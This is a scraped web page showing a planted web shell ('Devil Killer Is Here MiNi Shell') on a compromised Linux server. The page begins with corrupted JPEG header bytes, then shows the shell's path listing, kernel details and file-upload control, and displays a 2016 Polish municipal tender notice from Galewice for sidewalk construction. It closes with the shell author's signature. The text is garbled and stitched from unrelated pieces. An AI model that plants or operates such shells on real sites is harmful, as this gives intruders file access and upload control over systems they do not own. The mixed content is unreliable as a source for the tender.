JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160719/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160719/143627-N-2016.html

<p class="kh_header"><b>Galewice: Przebudowa chodnika w miejscowości Niwiska i budowa chodnika w miejscowości Ostrówek.</b><br>
<b>Numer ogłoszenia: 143627 - 2016; data zamieszczenia: 19.07.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Galewice , ul. Wieluńska 5, 98-405 Galewice, woj. łódzkie, tel. 062 7838039, faks 062 7838039.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przebudowa chodnika w miejscowości Niwiska i budowa chodnika w miejscowości Ostrówek..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest robota budowlana obejmująca: - przebudowę chodnika przy drodze gminnej nr 118289E w miejscowości Niwiska - budowę chodnika przy drodze gminnej 118 163E w miejscowości Ostrówek. Zamawiający dopuszcza składanie ofert częściowych na jedną lub dwie części Część I Przebudowa chodnika przy drodze gminnej nr 118289E w miejscowości Niwiska na odcinku o długości 0, 570km od km 1+079 do km 0+509 Zakres prac obejmuje rozebranie istniejącego chodnika z płyt betonowych /materiał z rozbiórki stanowi własność Zamawiającego/ i wykonanie nowego z kostki brukowej szarej, o grubości 6 cm na podsypce piaskowej o grubości 5-10 cm. Chodnik od strony posesji ograniczyć obrzeżem betonowym 8x30 na ławie a od strony jezdni krawężnikiem betonowym 15x30 na lawie. . Nawierzchni chodnika nadać spadek poprzeczny 2% w kierunku jezdni. Zjazdy do posesji wykonać z kostki betonowej czerwonej grubości 8 cm ułożonej na podbudowie z mieszanki 0/63 mm stabilizowanej mechanicznie, grubość warstwy 15 cm. Na zjazdach krawężnik zaniżyć do 2cm i zastosować krawężnik najazdowy. Istniejące zjazdy z kostki brukowej należy przełożyć dostosowując do nowej niwelety chodnika. Roboty wykończeniowe polegać będą na wypełnieniu mieszanką asfaltu ubytków przy krawężniku, regulacji studzienek, ręcznym plantowaniu i humusowaniu skarp wraz z obsianiem trawą. Wszystkie materiały na realizację zamówienia zabezpieczy Wykonawca. Szczegółowy zakres prac przedstawiono w kosztorysie ofertowym -zał. nr 2 opracowanym na podstawie przedmiaru robót. Część II Budowa chodnika przy drodze gminnej nr 118263 E w miejscowości Ostrówek, odcinek o długości 0, 230km Zakres prac obejmuje budowę chodnika o szerokości 1,20m z betonowej kostki brukowej o grubości 6 cm na podsypce piaskowej o gr.10-20 cm , wykonanie dwóch studzienek ściekowych i przykanalika na odcinku 70 mb Chodnik od strony posesji ograniczyć obrzeżem betonowym 6x20 na ławie betonowej a od strony jezdni krawężnikiem betonowym typu ulicznego 15x30 ułożonym na ławie betonowej. Nawierzchni chodnika nadać spadek poprzeczny 2% w kierunku jezdni. Zjazdy do posesji wykonać z kostki betonowej czerwonej grubości 8 cm ułożonej na podbudowie z mieszanki 0/63 mm stabilizowanej mechanicznie. Na zjazdach krawężnik zaniżyć. Roboty wykończeniowe polegać będą na wypełnieniu mieszanką asfaltu ubytków przy krawężniku, regulacji studzienek. Zamawiający dostarczy Wykonawcy na teren budowy wcześniej zakupione na to zadanie następujące materiały: - kostkę brukową, szarą prostokątną o grubości 6 cm w ilości 205m2 - kostkę brukowa czerwoną prostokątną o gr 8 cm w ilości 55 m2 - krawężnik betonowy 15x30x100 -230mb - obrzeże chodnikowe 6x20x100 -230mb - studzienki uliczne betonowe o śr.500mm wraz z wpustem -2szt -rura PCV śr 160 mm -75 m -trójnik PCV Fi 160/160/90 -2szt -kolano PCV FI 160/90 -2szt -kolano PCV FI 160/45 -2szt -rura PCV FI 400 -18 mb Pozostałe materiały zabezpieczy Wykonawca. Szczegółowy zakres prac przedstawiono w kosztorysie ofertowym -zał. nr 3, opracowanym na podstawie przedmiaru robót..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.23-7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 20.11.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje dodatkowych warunków w tym zakresie. Wykonawca potwierdza spełnienie powyższego warunku poprzez złożenie oświadczenia - zgodnie z załącznikiem nr 4</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje dodatkowych warunków w tym zakresie. Wykonawca potwierdza spełnienie powyższego warunku poprzez złożenie oświadczenia - zgodnie z załącznikiem nr 4</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje dodatkowych warunków w tym zakresie. Wykonawca potwierdza spełnienie powyższego warunku poprzez złożenie oświadczenia - zgodnie z załącznikiem nr 4</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje dodatkowych warunków w tym zakresie. Wykonawca potwierdza spełnienie powyższego warunku poprzez złożenie oświadczenia - zgodnie z załącznikiem nr 4</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje dodatkowych warunków w tym zakresie. Wykonawca potwierdza spełnienie powyższego warunku poprzez złożenie oświadczenia - zgodnie z załącznikiem nr 4</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1) formularz ofertowy 2)	kosztorys ofertowy zgodnie z załącznikiem nr 2 do SIWZ w przypadku składania oferty na część I zamówienia, 3)	kosztorys ofertowy zgodnie z załącznikiem nr 3 do SIWZ w przypadku składania oferty na część I I zamówienia, 4) pełnomocnictwo / w formie oryginału lub odpisu, poświadczonego notarialnie/ w przypadku składania oferty wspólnej /konsorcjum/, 5) pełnomocnictwo / w formie oryginału lub odpisu poświadczonego notarialnie/ lub inny dokument określający zakres umocowania do reprezentowania Wykonawcy w przypadku podpisania oferty przez pełnomocnika Wykonawcy, 6) oświadczenie Wykonawcy, że wykona zamówienie własnymi siłami lub określi część zamówienia, której wykonanie powierzy podwykonawcy zgodnie z zał. nr 7 do SIWZ</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 96</li>
<li>2 - Gwarancja - 4</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>3.	Zamawiający przewiduje możliwość dokonania zmian postanowień zawartej umowy w następujących przypadkach: 1/ termin realizacji przedmiotu umowy może ulec zmianie w przypadku: a)	wystąpienia okoliczności niezależnych od Wykonawcy przy zachowaniu przez niego należytej staranności np. wystąpienia warunków pogodowych nie pozwalających na wykonanie zamówienia, b)	wystąpienia robót dodatkowych lub zamiennych oraz zamówień dodatkowych niezbędnych do prawidłowego wykonania zamówieni, których wykonanie stało się konieczne, c)	ujawnienie niezinwentaryzowanych urządzeń obcych i konieczność wykonania robót związanych z ich zabezpieczeniem lub przełożeniem, d)	innych okoliczności niezależnych od Wykonawcy, pod warunkiem wyrażenia zgody przez zamawiającego, e)	wstrzymania przez Zamawiającego wykonania robót nie wynikających z okoliczności leżących po stronie Wykonawcy, 2/ zmiany kierownika budowy lub inspektora nadzoru. W przypadku zmiany kierownika budowy , nowy kierownik musi spełniać wymagania określone w Specyfikacji Istotnych Warunków Umowy, 3/ zmian lub rezygnacji z Podwykonawcy, 4/ zmiany wynagrodzenia i ilości robót objętych przedmiarem i kosztorysem ofertowym w sytuacji gdy wykonanie części, określonych umową, robót będzie zbędne dla prawidłowego tj. zgodnego z zasadami wiedzy technicznej i obowiązującymi przepisami wykonania umowy, 5/ zmian w zakresie zasad rozliczeń i warunków płatności związanych z zawarciem umowy o podwykonawstwo lub dalsze podwykonawstwo.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.galewice.biuletyn.net<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Galewice, ul.Wieluńska 5, 98-405 Galewice - Urząd Gminy pok. 202..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 04.08.2016 godzina 14:30, miejsce: Galewice, ul.Wieluńska 5, 98-405 Galewice - Urząd Gminy pok. 208.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Przebudowa chodnika przy drodze gminnej nr 118289E w miejscowości Niwiska..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część I Przebudowa chodnika przy drodze gminnej nr 118289E w miejscowości Niwiska na odcinku o długości 0, 570km od km 1+079 do km 0+509 Zakres prac obejmuje rozebranie istniejącego chodnika z płyt betonowych /materiał z rozbiórki stanowi własność Zamawiającego/ i wykonanie nowego z kostki brukowej szarej, o grubości 6 cm na podsypce piaskowej o grubości 5-10 cm. Chodnik od strony posesji ograniczyć obrzeżem betonowym 8x30 na ławie a od strony jezdni krawężnikiem betonowym 15x30 na lawie. . Nawierzchni chodnika nadać spadek poprzeczny 2% w kierunku jezdni. Zjazdy do posesji wykonać z kostki betonowej czerwonej grubości 8 cm ułożonej na podbudowie z mieszanki 0/63 mm stabilizowanej mechanicznie, grubość warstwy 15 cm. Na zjazdach krawężnik zaniżyć do 2cm i zastosować krawężnik najazdowy. Istniejące zjazdy z kostki brukowej należy przełożyć dostosowując do nowej niwelety chodnika. Roboty wykończeniowe polegać będą na wypełnieniu mieszanką asfaltu ubytków przy krawężniku, regulacji studzienek, ręcznym plantowaniu i humusowaniu skarp wraz z obsianiem trawą. Wszystkie materiały na realizację zamówienia zabezpieczy Wykonawca. Szczegółowy zakres prac przedstawiono w kosztorysie ofertowym -zał. nr 2 opracowanym na podstawie przedmiaru robót..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.23-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 20.11.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 96</li>
<li>2. Gwarancja - 4</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Budowa chodnika przy drodze gminnej nr 118263 E w miejscowości Ostrówek, odcinek o długości 0, 230km..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres prac obejmuje budowę chodnika o szerokości 1,20m z betonowej kostki brukowej o grubości 6 cm na podsypce piaskowej o gr.10-20 cm , wykonanie dwóch studzienek ściekowych i przykanalika na odcinku 70 mb Chodnik od strony posesji ograniczyć obrzeżem betonowym 6x20 na ławie betonowej a od strony jezdni krawężnikiem betonowym typu ulicznego 15x30 ułożonym na ławie betonowej. Nawierzchni chodnika nadać spadek poprzeczny 2% w kierunku jezdni. Zjazdy do posesji wykonać z kostki betonowej czerwonej grubości 8 cm ułożonej na podbudowie z mieszanki 0/63 mm stabilizowanej mechanicznie. Na zjazdach krawężnik zaniżyć. Roboty wykończeniowe polegać będą na wypełnieniu mieszanką asfaltu ubytków przy krawężniku, regulacji studzienek. Zamawiający dostarczy Wykonawcy na teren budowy wcześniej zakupione na to zadanie następujące materiały: - kostkę brukową, szarą prostokątną o grubości 6 cm w ilości 205m2 - kostkę brukowa czerwoną prostokątną o gr 8 cm w ilości 55 m2 - krawężnik betonowy 15x30x100 -230mb - obrzeże chodnikowe 6x20x100 -230mb - studzienki uliczne betonowe o śr.500mm wraz z wpustem -2szt -rura PCV śr 160 mm -75 m -trójnik PCV Fi 160/160/90 -2szt -kolano PCV FI 160/90 -2szt -kolano PCV FI 160/45 -2szt -rura PCV FI 400 -18 mb Pozostałe materiały zabezpieczy Wykonawca. Szczegółowy zakres prac przedstawiono w kosztorysie ofertowym -zał. nr 3, opracowanym na podstawie przedmiaru robót..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.23-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 20.11.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 96</li>
<li>2. Gwarancja - 4</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com